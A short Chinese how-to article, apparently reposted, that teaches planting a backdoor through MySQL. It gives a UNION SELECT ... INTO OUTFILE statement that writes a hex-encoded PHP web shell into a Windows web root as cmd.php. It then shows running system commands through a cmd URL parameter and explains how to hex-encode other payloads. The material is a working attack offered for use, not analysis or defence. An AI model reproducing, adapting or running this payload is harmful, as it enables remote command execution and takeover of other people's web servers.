mysql 数据库留后门,运用Mysql语句生成后门木马的具体方法

通过Mysql 的语句生成后门木马的方法：

SELECT * FROM `vbb_strikes` WHERE 1 union select

2,3,0x3C3F7068702073797374656D28245F52455155455

3545B636D645D293B3F3E

from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

通过Mysql 的注入或在 phpmyadmin 里运行以上语句，则会C:/inetpub/wwwroot/下生成 cmd.php 文档，内容为原来的 vbb_strikes 内容，后面紧跟着：

2 3

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就能够执行系统DOS命令！

问：那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么？

答：就是下面代码中的十六进制编码，

假如不用这种方法，有不同的SQL版本会出现其他的编码：如%xx之类的，哪这个后门就不能执行了！假如您有其他语名要弄，能够到UltraEdit里输入，再按[Ctrl H]键，将里面的十六进制连在一起就能够了！

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com

特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！